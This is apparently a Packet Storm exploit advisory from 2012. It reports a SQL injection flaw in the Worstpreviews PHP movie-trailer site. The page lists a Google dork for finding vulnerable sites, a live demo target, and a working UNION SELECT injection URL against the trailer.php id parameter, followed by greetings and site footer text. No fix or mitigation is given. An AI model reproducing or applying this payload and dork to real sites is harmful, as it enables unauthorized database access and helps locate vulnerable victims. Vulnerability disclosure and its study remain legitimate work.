Worstpreviews suffers from a remote SQL injection vulnerability.
1d11e1d42d7c07005b6b1ac13785647d8bccdd8500c54f091e798930812cd3e4
########################################################
~ Exploit Title: * Worstpreviews SQL Injection *~
~ Author: Th4 MasK
~ Contact to ; th4_mask@windowslive.com ~
~ Software Website: http://www.worstpreviews.com/
~ Date : 13.02.2012 ~
~ Vendor : http://hiregroundsoftware.com/
~ Platform : Php ~
~ Dork : trailer.php?id=
########################################################
~ Demo Site :
~ http://www.worstpreviews.com/trailer.php?id=490[SQL]&item=0
Exploit :
http://www.worstpreviews.com/trailer.php?id=490+AND+1=2+UNION+SELECT+1,2--
########################################################
~* Bilinmezlik DiyarinDan
########################################################
~* Olmassa Olmazimdir. Bazi seyler.
########################################################
~ Greetz: http://th4mask.blogspot.com ~
########################################################
~ ZoRRoKiN,Mugair,Nikolay,Darkness Devil,Tekfurdagli,Evillord
########################################################
~ Contact to ; th4_mask@windowslive.com ~
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed